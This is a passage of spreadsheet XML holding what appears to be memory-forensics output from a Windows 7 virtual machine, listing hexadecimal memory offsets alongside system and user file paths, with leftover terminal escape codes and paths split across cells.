    <t>\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Power Efficien_x001B_</t>
  </si>
  <si>
    <t>0xdeaae680</t>
  </si>
  <si>
    <t>0xdeaaea68</t>
  </si>
  <si>
    <t>0xdeaaee50</t>
  </si>
  <si>
    <t>0xdeaaf1d0</t>
  </si>
  <si>
    <t>0xdeaaf288</t>
  </si>
  <si>
    <t>\Users\Support\Desktop\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaaf530</t>
  </si>
  <si>
    <t>0xdeaaf5e8</t>
  </si>
  <si>
    <t>0xdeaaf9d0</t>
  </si>
  <si>
    <t>0xdeaafdb8</t>
  </si>
  <si>
    <t>0xdeab0298</t>
  </si>
  <si>
    <t>0xdeab0680</t>
  </si>
  <si>
    <t>0xdeab0a68</t>
  </si>
  <si>
    <t>0xdeab0e50</t>
  </si>
  <si>
    <t>0xdeab1298</t>
  </si>
  <si>
    <t>0xdeab1680</t>
  </si>
  <si>
    <t>0xdeab1a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_116_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K_x001B_[1</t>
  </si>
  <si>
    <t>00G</t>
  </si>
  <si>
    <t>0xdeab1e50</t>
  </si>
  <si>
    <t>0xdeab2298</t>
  </si>
  <si>
    <t>0xdeab2680</t>
  </si>
  <si>
    <t>0xdeab2a68</t>
  </si>
  <si>
    <t>0xdeab2e50</t>
  </si>
  <si>
    <t>0xdeab3298</t>
  </si>
  <si>
    <t>0xdeab3680</t>
  </si>
  <si>
    <t>0xdeab39b0</t>
  </si>
  <si>
    <t>\Windows\System32\imapi2.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeab3a68</t>
  </si>
  <si>
    <t>0xdeab3e50</t>
  </si>
  <si>
    <t>0xdeab41d0</t>
  </si>
  <si>
    <t>0xdeab45b8</t>
  </si>
  <si>
    <t>0xdeab48e8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Trans</t>
  </si>
  <si>
    <t>fer Reports.l</t>
  </si>
  <si>
    <t>0xdeab49a0</t>
  </si>
  <si>
    <t>0xdeab4d98</t>
  </si>
  <si>
    <t>\Windows\AppCompat\Programs\Amcache.hve_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeab4e50</t>
  </si>
  <si>
    <t>0xdeab51b0</t>
  </si>
  <si>
    <t>0xdeab5300</t>
  </si>
  <si>
    <t>0xdeab55e8</t>
  </si>
  <si>
    <t>\Windows\System32\srvcli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeab56e8</t>
  </si>
  <si>
    <t>0xdeab5ad0</t>
  </si>
  <si>
    <t>0xdeab5e00</t>
  </si>
  <si>
    <t>\Windows\System32\ieframe.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeab5eb8</t>
  </si>
  <si>
    <t>0xdeab63a8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeab6518</t>
  </si>
  <si>
    <t>0xdeab6900</t>
  </si>
  <si>
    <t>0xdeab6ce8</t>
  </si>
  <si>
    <t>0xdeab7298</t>
  </si>
  <si>
    <t>0xdeab7680</t>
  </si>
  <si>
    <t>0xdeab7a68</t>
  </si>
  <si>
    <t>0xdeab7e50</t>
  </si>
  <si>
    <t>0xdeab81a8</t>
  </si>
  <si>
    <t>0xdeab8590</t>
  </si>
  <si>
    <t>0xdeab8978</t>
  </si>
  <si>
    <t>0xdeab9200</t>
  </si>
  <si>
    <t>0xdeab95e8</t>
  </si>
  <si>
    <t>0xdeab99d0</t>
  </si>
  <si>
    <t>0xdeab9db8</t>
  </si>
  <si>
    <t>0xdeaba0c8</t>
  </si>
  <si>
    <t>\Windows\System32\VBoxMRXNP.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaba778</t>
  </si>
  <si>
    <t>0xdeabb038</t>
  </si>
  <si>
    <t>0xdeabb288</t>
  </si>
  <si>
    <t>0xdeabb7b0</t>
  </si>
  <si>
    <t>0xdeabbb98</t>
  </si>
  <si>
    <t>0xdeabbf80</t>
  </si>
  <si>
    <t>0xdeabc038</t>
  </si>
  <si>
    <t>0xdeabc480</t>
  </si>
  <si>
    <t>0xdeabc7d0</t>
  </si>
  <si>
    <t>0xdeabcc50</t>
  </si>
  <si>
    <t>0xdeabd038</t>
  </si>
  <si>
    <t>0xdeabd3b8</t>
  </si>
  <si>
    <t>0xdeabd7a0</t>
  </si>
  <si>
    <t>0xdeabdb88</t>
  </si>
  <si>
    <t>0xdeabdd80</t>
  </si>
  <si>
    <t>\Windows\System32\fdWNet.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeabe3c8</t>
  </si>
  <si>
    <t>0xdeabe7b0</t>
  </si>
  <si>
    <t>0xdeabeb98</t>
  </si>
  <si>
    <t>0xdeabef80</t>
  </si>
  <si>
    <t>0xdeabf300</t>
  </si>
  <si>
    <t>0xdeabf6e8</t>
  </si>
  <si>
    <t>0xdeabfad0</t>
  </si>
  <si>
    <t>0xdeabff80</t>
  </si>
  <si>
    <t>0xdeac0338</t>
  </si>
  <si>
    <t>0xdeac0668</t>
  </si>
  <si>
    <t>\Windows\AppCompat\Programs\Amcache.hve.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeac0720</t>
  </si>
  <si>
    <t>0xdeac0e60</t>
  </si>
  <si>
    <t>\Windows\System32\taskschd.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeac0f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2952664~31bf3856ad364e35~x86~~6.1.25.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeac1270</t>
  </si>
  <si>
    <t>0xdeac1a68</t>
  </si>
  <si>
    <t>0xdeac1e60</t>
  </si>
  <si>
    <t>0xdeac1f18</t>
  </si>
  <si>
    <t>0xdeac2270</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2732487~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeac25a0</t>
  </si>
  <si>
    <t>\Windows\AppCompat\Programs\Amcache.hve.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeac2658</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2532531~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeac2e50</t>
  </si>
  <si>
    <t>0xdeac34f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2853952~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeac38e0</t>
  </si>
  <si>
    <t>0xdeac48d8</t>
  </si>
  <si>
    <t>0xdeac5228</t>
  </si>
  <si>
    <t>0xdeac5610</t>
  </si>
  <si>
    <t>0xdeac5940</t>
  </si>
  <si>
    <t>0xdeac59f8</t>
  </si>
  <si>
    <t>0xdeac6038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk</t>
  </si>
  <si>
    <t>0xdeac61a0</t>
  </si>
  <si>
    <t>0xdeac6588</t>
  </si>
  <si>
    <t>0xdeac68b8</t>
  </si>
  <si>
    <t>\Windows\System32\UIAutomationCore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeac6970</t>
  </si>
  <si>
    <t>0xdeac6e20</t>
  </si>
  <si>
    <t>0xdeac7c50</t>
  </si>
  <si>
    <t>0xdeaca0e8</t>
  </si>
  <si>
    <t>\Windows\System32\ExplorerFrame.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaca520</t>
  </si>
  <si>
    <t>0xdeacaf30</t>
  </si>
  <si>
    <t>\Windows\System32\duser.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeacb560</t>
  </si>
  <si>
    <t>\Windows\System32\EhStorShell.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeacb9a0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeacc3e0</t>
  </si>
  <si>
    <t>0xdeacc7c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB976932~31bf3856ad364e35~x86~~6.1.1.17514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaccbe0</t>
  </si>
  <si>
    <t>0xdeaccdc8</t>
  </si>
  <si>
    <t>\Windows\System32\HotStartUserAgent.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeacd3b8</t>
  </si>
  <si>
    <t>0xdeacd470</t>
  </si>
  <si>
    <t>\Users\Support\Links\RecentPlaces.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeacd5c0</t>
  </si>
  <si>
    <t>0xdeacd878</t>
  </si>
  <si>
    <t>0xdeacdad0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Internet Explorer\DOMStore\JS8BSCIU\www.msn[1].xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeacdb88</t>
  </si>
  <si>
    <t>\Windows\System32\shdocvw.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeacf608</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeacf9c0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4242CCC9815D8F6471A3CFD76F</t>
  </si>
  <si>
    <t>AF78FE_000A1F</t>
  </si>
  <si>
    <t>BDE3E9F0BBF</t>
  </si>
  <si>
    <t>93AEFF</t>
  </si>
  <si>
    <t>847107452_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeacfe48</t>
  </si>
  <si>
    <t>\Windows\System32\SoundRecorder.exe_x001B_[0K_x001B_[150G</t>
  </si>
  <si>
    <t>0xdeacff80</t>
  </si>
  <si>
    <t>0xdead1180</t>
  </si>
  <si>
    <t>0xdead1258</t>
  </si>
  <si>
    <t>\Windows\System32\FXSAPI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead1310</t>
  </si>
  <si>
    <t>\Windows\System32\msimtf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead1b50</t>
  </si>
  <si>
    <t>\Windows\System32\acppage.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead2628</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1C3A392E76D21B057FCA301507</t>
  </si>
  <si>
    <t>B1C36D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead2708</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1BB09BEEC155258835C193A7AA</t>
  </si>
  <si>
    <t>85AA5B_8C6CD4</t>
  </si>
  <si>
    <t>67F642DD068</t>
  </si>
  <si>
    <t>D4C9ED</t>
  </si>
  <si>
    <t>AF0150059_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead2848</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C7</t>
  </si>
  <si>
    <t>7A26CB_7CE95D</t>
  </si>
  <si>
    <t>8DCA26FE957</t>
  </si>
  <si>
    <t>E7BD7D</t>
  </si>
  <si>
    <t>76F353B08_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead3328</t>
  </si>
  <si>
    <t>\Program Files\Common Files\microsoft shared\ink\mip.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead33e0</t>
  </si>
  <si>
    <t>\Windows\System32\DisplaySwitch.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead35b0</t>
  </si>
  <si>
    <t>fer.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead3a58</t>
  </si>
  <si>
    <t>0xdead3ca8</t>
  </si>
  <si>
    <t>\Windows\System32\samlib.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead4d68</t>
  </si>
  <si>
    <t>\Windows\System32\netutils.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead4eb8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\E2BVLEIT.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead4f80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead54e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\iscsicpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead55f0</t>
  </si>
  <si>
    <t>\Windows\System32\recdisc.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead5a30</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead8d78</t>
  </si>
  <si>
    <t>\Windows\System32\StikyNot.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdead8ea0</t>
  </si>
  <si>
    <t>0xdead9038</t>
  </si>
  <si>
    <t>0xdead93e8</t>
  </si>
  <si>
    <t>0xdead9d80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeada148</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\IconCache.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeae1f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desk</t>
  </si>
  <si>
    <t>top.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeae21a8</t>
  </si>
  <si>
    <t>0xdeae24c8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeae25a0</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeae2898</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaeb098</t>
  </si>
  <si>
    <t>0xdeaebcb0</t>
  </si>
  <si>
    <t>\Program Files\DVD Maker\en-US\DVDMaker.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaebd68</t>
  </si>
  <si>
    <t>0xdeafd200</t>
  </si>
  <si>
    <t>\Windows\System32\wmpps.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeafd340</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeafd3f8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeafd7a0</t>
  </si>
  <si>
    <t>\Windows\System32\sdcpl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeafdb60</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeafecb0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk_x001B_[0</t>
  </si>
  <si>
    <t>0xdeaff638</t>
  </si>
  <si>
    <t>\Windows\System32\wsock32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaff838</t>
  </si>
  <si>
    <t>\Windows\System32\calc.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaff910</t>
  </si>
  <si>
    <t>\Windows\System32\wwapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaffb18</t>
  </si>
  <si>
    <t>\Windows\System32\SNTSearch.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaffe18</t>
  </si>
  <si>
    <t>\Windows\System32\lsm.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb005c8</t>
  </si>
  <si>
    <t>0xdeb01270</t>
  </si>
  <si>
    <t>\Users\Support\Searches\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb01328</t>
  </si>
  <si>
    <t>\Users\Support\Contacts\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb01798</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Y5MHK58\4</t>
  </si>
  <si>
    <t>1-0bee62-68dd</t>
  </si>
  <si>
    <t>b2ab[1].js_x001B_</t>
  </si>
  <si>
    <t>0xdeb03038</t>
  </si>
  <si>
    <t>\Windows\System32\mblctr.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb03478</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb03f80</t>
  </si>
  <si>
    <t>ndows Media P</t>
  </si>
  <si>
    <t>layer.lnk_x001B_[</t>
  </si>
  <si>
    <t>0xdeb04390</t>
  </si>
  <si>
    <t>0xdeb04448</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb049f0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb04aa8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\SystemCertificates\My_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb04b60</t>
  </si>
  <si>
    <t>0xdeb04f18</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A91392</t>
  </si>
  <si>
    <t>39A396_D76DB9</t>
  </si>
  <si>
    <t>01EE986B889</t>
  </si>
  <si>
    <t>F30D8C</t>
  </si>
  <si>
    <t>C06229E2D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb056e0</t>
  </si>
  <si>
    <t>\Users\Support\Documents\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb05838</t>
  </si>
  <si>
    <t>\Windows\System32\pnrpsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb05ab8</t>
  </si>
  <si>
    <t>\Windows\System32\davclnt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb05b70</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb06038</t>
  </si>
  <si>
    <t>\Users\Support\Favorites\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb06d00</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\I</t>
  </si>
  <si>
    <t>NDEX.001_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb06f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\In</t>
  </si>
  <si>
    <t>ternet Explor</t>
  </si>
  <si>
    <t>er.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb07438</t>
  </si>
  <si>
    <t>0xdeb07dd0</t>
  </si>
  <si>
    <t>\Windows\System32\VBoxTray.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb07e88</t>
  </si>
  <si>
    <t>\Windows\Branding\ShellBrd\shellbrd.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb08038</t>
  </si>
  <si>
    <t>\Users\Public\Documents\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb083e0</t>
  </si>
  <si>
    <t>\Users\Support\Pictures\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb08730</t>
  </si>
  <si>
    <t>0xdeb09d98</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_e</t>
  </si>
  <si>
    <t>n-us_581cd2bf</t>
  </si>
  <si>
    <t>5825dde9\co</t>
  </si>
  <si>
    <t>mctl32</t>
  </si>
  <si>
    <t>.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb0a248</t>
  </si>
  <si>
    <t>\Windows\System32\SnippingTool.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb0ad10</t>
  </si>
  <si>
    <t>\Windows\System32\netlogon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb0bd18</t>
  </si>
  <si>
    <t>\Windows\System32\perfproc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb0bdd0</t>
  </si>
  <si>
    <t>\Users\Support\Links\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb0c208</t>
  </si>
  <si>
    <t>\Windows\System32\mshtml.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb0c350</t>
  </si>
  <si>
    <t>\Users\Support\Downloads\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb0c928</t>
  </si>
  <si>
    <t>6E1C7C_D734EC</t>
  </si>
  <si>
    <t>3DD00546F46</t>
  </si>
  <si>
    <t>D36832</t>
  </si>
  <si>
    <t>5396086B0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeb0d3e0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Protect\S-1-5-21-3583694148-1414552638-2922671848-100</t>
  </si>
  <si>
    <t>4\Preferred_x001B_[</t>
  </si>
  <si>
    <t>0xdebc2038</t>
  </si>
  <si>
    <t>\wkssvc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc2188</t>
  </si>
  <si>
    <t>\Windows\System32\kdcom.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc64a0</t>
  </si>
  <si>
    <t>drvstore.dl</t>
  </si>
  <si>
    <t>0xdebc67d8</t>
  </si>
  <si>
    <t>\Windows\System32\BOOTVID.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc6a00</t>
  </si>
  <si>
    <t>\Windows\System32\PSHED.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc6d40</t>
  </si>
  <si>
    <t>\Windows\System32\clfs.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc7350</t>
  </si>
  <si>
    <t>\Windows\System32\ntkrnlpa.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc76d0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\Wdf01000.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc77f8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\acpi.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc7ad0</t>
  </si>
  <si>
    <t>\Windows\System32\ci.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc7c10</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\cng.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc7d80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\WdfLdr.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc88e0</t>
  </si>
  <si>
    <t>\Windows\System32\halacpi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc9990</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\msisadrv.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc9b00</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\wmilib.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc9c70</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\compbatt.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebc9ec8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\partmgr.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebca260</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\battc.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebca558</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\mountmgr.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebca798</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\winhv.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebca970</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\volmgrx.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcaa28</t>
  </si>
  <si>
    <t>\Windows\System32\msxml6.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcab68</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\pciidex.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcaf80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\volmgr.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcb450</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\VBoxGuest.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcb548</t>
  </si>
  <si>
    <t>\Windows\System32\wlms\wlms.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcb600</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\netio.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcba30</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\pcw.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcbe10</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\msrpc.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcc258</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ndis.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcc818</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\fs_rec.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcd218</t>
  </si>
  <si>
    <t>\Windows\System32\msxml6r.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcd6f0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\Classpnp.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcd818</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WMIsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcdc08</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\hwpolicy.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebce560</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ksecpkg.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcec20</t>
  </si>
  <si>
    <t>0xdebceee8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\FWPKCLNT.SYS_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcf028</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\tcpip.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcf110</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\mup.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcf280</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\disk.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcf670</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\spldr.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcf7f8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\fvevol.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcf9d0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\volsnap.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcfda8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\vmstorfl.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebcfe50</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\rdyboost.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd0450</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\vmbus.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd08b8</t>
  </si>
  <si>
    <t>\Windows\System32\config\TxR\{6cced300-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd0960</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ataport.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd0a08</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ntfs.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd1028</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\intelide.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd1388</t>
  </si>
  <si>
    <t>\Windows\System32\trkwks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd17f0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ksecdd.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd19c8</t>
  </si>
  <si>
